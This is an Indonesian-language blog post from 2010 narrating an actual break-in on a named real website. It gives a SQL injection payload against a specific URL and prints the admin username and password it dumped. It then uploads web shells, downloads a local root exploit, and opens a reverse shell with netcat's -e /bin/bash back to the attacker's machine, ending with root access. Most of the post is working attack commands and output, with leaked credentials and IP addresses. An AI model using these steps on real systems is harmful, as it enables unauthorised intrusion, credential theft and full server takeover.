Sabtu, 07 Agustus 2010

[POC] SQL injection to Root Part 2

heheheh lanjut dah, ga tau ane mu bilang apa lagi, maklum cupu abis :D

target
[url=http://www.pubbkk.com]http://www.pubbkk.com[/url]
langkah 1 (karna udah ada ada tool jadi males nginject manual) :)


pake tool kerinci versi 0.7 download di [url=http://kerinci.net]kerinci.net[/url]
http://www.pubbkk.com/view_detail.php?id=103/**/AND/**/__TIME__=0/**/UNION/**/ALL/**/SELECT/**/1,/**/2,/**/3,/**/__CODE__--

[pubbkk]
admin           : id,count,password,email,date
yakuzakiku : yakuza2529 : yakuza2529 : 2007-04-05
login disini

[url=http://www.pubbkk.com/admin/]http://www.pubbkk.com/admin/[/url]

upload shell

kemudian explore dulu
ni shellnya
http://www.pubbkk.com/wenkhairu.txt
http://www.pubbkk.com/upload/girls/thumb_92x52/1.php
time to get root bebe :)

cek kerenel linux
uname -a

Linux linux1.yes-hosting.com 2.6.15-54-server #1 SMP Tue Aug 18 17:32:23 UTC 2009 i686 GNU/Linux
browsing local root exploit dan download
wget http://www.exploit-db.com/sploits/android-root-20090816.tar.gz
cek ketersedian perl dan gcc
whereis perl
whereis gcc
perl: /usr/bin/perl /usr/bin/perl.my /etc/perl /usr/lib/perl /usr/bin/X11/perl /usr/bin/X11/perl.my /usr/local/lib/perl /usr/share/perl /usr/share/man/man1/perl.1.gz

gcc: /usr/bin/gcc /usr/lib/gcc /usr/bin/X11/gcc /usr/share/man/man1/gcc.1.gz
lakukan backconnect

untuk backconnect caranya bisa liat thread bro wisdom di sini [url=http://forum.devilzc0de.org/thread-2741.html]http://forum.devilzc0de.org/thread-2741.html[/url]
kalo udah siapin netcat di PC lo, trus listening port
wenkhairu@localhost:$ nc -vlp 12345
listening on [any] 12345 ...
kalo mau pake netcat di server target juga ndak apa2

caranya


download netcat
wget http://www.net-security.org/dl/software/netcat-0.7.1.tar.bz2
install netcat di target
tar -jxvf netcat-0.7.1.tar.bz2
cd /netcat-0.7.1
./configure
./make
./nc –vv [IP_KITA] 12345 –e /bin/bash
wenkhairu@localhost:$./ nc -vlp 12345
listening on [any] 12345 ...
connect to [180.214.232.22] from (UNKNOWN) [61.19.242.241] 12345
id
uid=48(nobody) gid=48(nobody) groups=48(nobody)
uname –a
Linux linux1.yes-hosting.com 2.6.15-54-server #1 SMP Tue Aug 18 17:32:23 UTC 2009 i686
pake exploit local root dari hasil connect


so we are root now

segitu dolo, silahkan di explore lagi ye, maaf ndak pake gambar ga sempat ng capture udah ngantuk soalnya :)

ane mu bobo dulu heheheh
happy rooting dude

Tidak ada komentar:


ShoutMix chat widget